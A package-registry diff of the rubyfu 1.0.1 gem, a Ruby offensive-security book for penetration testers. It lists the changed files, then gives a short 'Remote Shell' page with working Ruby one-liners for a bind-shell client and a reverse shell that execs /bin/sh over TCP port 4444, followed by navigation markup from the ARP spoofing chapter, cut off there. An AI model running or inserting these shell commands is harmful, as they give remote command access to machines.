rubyfu 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
@@ -0,0 +1,19 @@
1
+ # Remote Shell
2
+
3
+ > **Note:** For windows systems, replace the "/bin/sh" to "cmd.exe"
4
+
5
+ ## Connect to Bind shell
6
+ from terminal
7
+ ```ruby
8
+ ruby -rsocket -e's=TCPSocket.new("192.168.0.13",4444);loop do;cmd=gets.chomp;s.puts cmd;s.close if cmd=="exit";puts s.recv(1000000);end'
9
+ ```
10
+
11
+ ## Reverse shell
12
+ from terminal
13
+ ```ruby
14
+ ruby -rsocket -e's=TCPSocket.open("0.0.0.0",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
15
+ ```
16
+
17
+ ## Bind and Reverse shell
18
+ This is an awesome implementation for standalone [bind](https://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells/blob/master/bind.rb) and [reverse](https://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells/blob/master/rubyrev.rb) shells scripts written by [Hood3dRob1n](https://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells) on GitHub . The bind shell requires authentication while reverse is not.
19
+
@@ -0,0 +1,1420 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>ARP Spoofing | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x3__network_kung_fu/dns_spoofing.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x3__network_kung_fu/packet_manipulation.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="3.10.1"
67
+ data-chapter-title="ARP Spoofing"
68
+ data-filepath="module_0x3__network_kung_fu/arp_spoofing.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter active" data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
